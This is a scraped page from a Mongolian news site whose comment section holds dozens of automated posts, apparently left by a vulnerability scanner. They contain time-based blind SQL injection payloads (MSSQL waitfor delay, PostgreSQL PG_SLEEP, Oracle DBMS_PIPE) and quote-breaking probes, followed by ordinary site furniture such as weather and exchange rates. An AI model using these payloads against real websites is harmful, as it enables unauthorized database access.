  8nm7wKfb'; waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 02:37 | 192.168.234.14

  -5 OR 368=(SELECT 368 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:37 | 192.168.234.14

  -5) OR 718=(SELECT 718 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:38 | 192.168.234.14

  -1)) OR 732=(SELECT 732 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:38 | 192.168.234.14

  M9tGxnBO' OR 108=(SELECT 108 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:38 | 192.168.234.14

  WSakrZi8') OR 932=(SELECT 932 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  tYPf9ego')) OR 665=(SELECT 665 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1'"

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1����%2527%2522

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  @@MRk3A

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:39 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:40 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:41 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 02:42 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-14 06:37 | 192.168.234.14

  1

Сэтгэгдэл үлдээх

wave
зочин1
зочин2
зочин3
зочин4
зочин5
зочин6
зочин7
зочин8

Уншигчдын бичсэн сэтгэгдэлд ErdenetToday.mn хариуцлага хүлээхгүй болно. Та сэтгэгдэл бичихдээ хууль зүйн болон ёс суртахууны хэм хэмжээг хүндэтгэнэ үү. Хэм хэмжээг зөрчсөн сэтгэгдэлийг админ устгах эрхтэй.

ӨНӨӨДРИЙН ЗУРХАЙ

wave
|
Нар минутад мандаж минутад жаргана.


Үс засуулвал:
Суудал:


Ярилцлага

wave
Л.Уранцэцэг: Манай бүтээмж чанарын дугуйлангууд үйлдвэрлэл, үйл ажиллагаанд тулгарсан асуудлыг шийдэхэд томоохон нөлөө үзүүлдэг
Ч.ХҮРЭЛБААТАР: Би 40 насандаа шатрын учрыг олж, 50 хүрч философийг нь ойлгосон
Б.ЧИНЗОРИГ: Энэ жил үйлдвэрлэлийн үндсэн 51 тоног төхөөрөмжид их засвар хийж, найдварт ажиллагааг хангана
Х.ДОЛГОРМАА: Ажилдаа чин сэтгэлтэй хандвал амжилт аяндаа ирнэ
Ж.Эрдэнэчимэг: Ажилтнууд 20 орчим нэр төрлийн багцаар эрүүл мэндийн үзлэгт хамрагдана
П.ПҮРЭВДОРЖ: Эрдэнэт үйлдвэр гэдэг нэр миний цол чимэг мэт санагддаг
Д.МӨНХБОЛД: Цаашид хиймэл оюун ухаан ашиглаж, аюул ослоос урьдчилан сэргийлнэ
О.ОТГОНБААТАР: Тоглоомоо гаднын зах зээлд гаргахад дэмжлэг хэрэгтэй
Б.БААСАНСҮРЭН: Ирэх онд төсөл хөтөлбөрүүдээ эрчимжүүлэхэд түлхүү анхаарч, сайн үр дүн хүлээж байна
“Цахим Эрдэнэт - 1” хөтөлбөр нийгмийн суурь хөгжилд хувь нэмрээ оруулна

Хайлт хийх ...

ESC дарж буцах боломжтой.

Цаг агаар
Эрдэнэт хот
Өнөөдөр
2023-12-31
-6°C
Багавтар үүлтэй
Салхи: 6м/сек
-13°C
Багавтар үүлтэй
Салхи: 5м/сек
2024-01-01
-6°C
Үүл багаснa
Салхи: 7м/сек
-16°C
Үүлшинэ
Салхи: 6м/сек
2024-01-02
-8°C
Багавтар үүлтэй
Салхи: 7м/сек
-18°C
Багавтар үүлтэй
Салхи: 6м/сек
2024-01-03
-6°C
Цас
Салхи: 5м/сек
-13°C
Үүлшинэ
Салхи: 5м/сек
2024-01-04
-10°C
Үүлшинэ
Салхи: 6м/сек
-17°C
Цас
Салхи: 5м/сек
Валютын ханш
Монголбанк
Валют Ханш
USD 3409.39 -0.0004 %
EUR 3731.58 -0.0161 %
GBP 4332.82 -0.0091 %
RUB 37.42 -0.0067 %
CNY 476.27 -0.0079 %
KRW 2.59 -0.0232 %
CAD 2548.89 -0.0144 %
NZD 2125.75 -0.0195 %
AUD 2285.66 -0.0225 %
JPY 23.61 -0.0258 %
HKD 436.62 +0.0004 %
SGD 2562.2 -0.0112 %
CHF 4010.58 -0.0131 %
SEK 331.69 -0.0360 %
TRY 114.24 -0.0140 %
THB 97.51 -0.0251 %